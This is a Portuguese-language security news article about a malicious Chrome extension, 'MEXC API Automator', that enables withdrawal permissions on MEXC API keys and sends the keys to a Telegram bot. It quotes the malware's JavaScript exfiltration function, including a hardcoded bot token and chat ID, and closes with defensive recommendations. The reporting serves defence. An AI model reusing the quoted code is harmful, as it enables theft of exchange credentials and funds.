Hack Alerta

Extensão maliciosa no Chrome rouba chaves API da MEXC e permite saques

Por Redação Hack Alerta Publicado em 13/01/2026 05:04 Riscos e Ameaças Tempo de leitura: 3 min

A extensão MEXC API Automator no Chrome marca permissões de saque em formulários de criação de chaves e exfiltra Access Key/Secret Key para um bot Telegram. Usuários devem remover a extensão e rotacionar chaves imediatamente.

Introdução

Pesquisadores da Socket.dev analisaram uma extensão Chrome chamada “MEXC API Automator” que, apesar de publicada no Web Store, atua como malware ao criar chaves API com permissões de saque e exfiltrar os pares Access Key / Secret Key para infraestrutura controlada pelo atacante.

Mecanismo de ataque

A extensão é Manifest V3 e injeta um content script (script.js) em padrões de URL do tipo *.mexc.com/user/openapi*. Ao detectar o formulário de criação de API, ela marca programaticamente todas as permissões — inclusive withdrawals — e altera o DOM para que a opção de saque pareça desabilitada, enganando o usuário.

Exfiltração e infraestrutura do atacante

Ao apresentar o modal de sucesso com Access Key e Secret Key, o script raspas os valores do DOM e envia ambos para um bot Telegram controlado por um token e chat ID codificados internamente. O comportamento exato identificado aparece no trecho abaixo (extraído da análise):

function sendKeysToTelegram(apiKey, secretKey) {
  const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
  const chatId  = '6526634583';
  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` })
  });
}

Por que a técnica é eficaz

  • Opera dentro da sessão já autenticada no navegador — não depende de roubo direto de credenciais do login.
  • As chaves API frequentemente têm validade longa e são usadas em bots e scripts, o que aumenta a janela de oportunidade para saque e movimentações automatizadas.
  • Envio por HTTPS e permanência dentro da sandbox do navegador ajudam a misturar o tráfego malicioso com o legítimo.

Recomendações

  • Remover imediatamente a extensão do navegador se instalada; examinar histórico de atividades em contas MEXC.
  • Rotacionar e revogar quaisquer chaves API geradas durante o período em que a extensão esteve instalada.
  • Preferir chaves com privilégios mínimos (least privilege) e habilitar controles adicionais de segurança oferecidos pela exchange (whitelists de IP, limites de saque).
  • Auditar extensões instaladas em estações de trabalho com acesso a exchanges e aplicar políticas de whitelisting em ambientes corporativos.

Limitações

O relatório técnico vincula o artefato a um ator identificado como jorjortan142 e demonstra o método de exfiltração; não há, contudo, uma estimativa pública do número de vítimas afetadas ou de perdas globais causadas por esse artefato divulgadas na análise original.

Referência

Análise técnica e código analisado por pesquisadores da Socket.dev.
Baseado em publicação original de Cyber Security News
Tags: #mexc #chrome-extension #api-keys #exfiltracao #telegram #manifest-v3 #security #crypto #socketdev
Publicado pela Redação Hack Alerta com base em fontes externas citadas e monitoramento editorial do Hack Alerta. Para decisões técnicas, operacionais ou jurídicas, confirme sempre os detalhes na fonte original.
← Voltar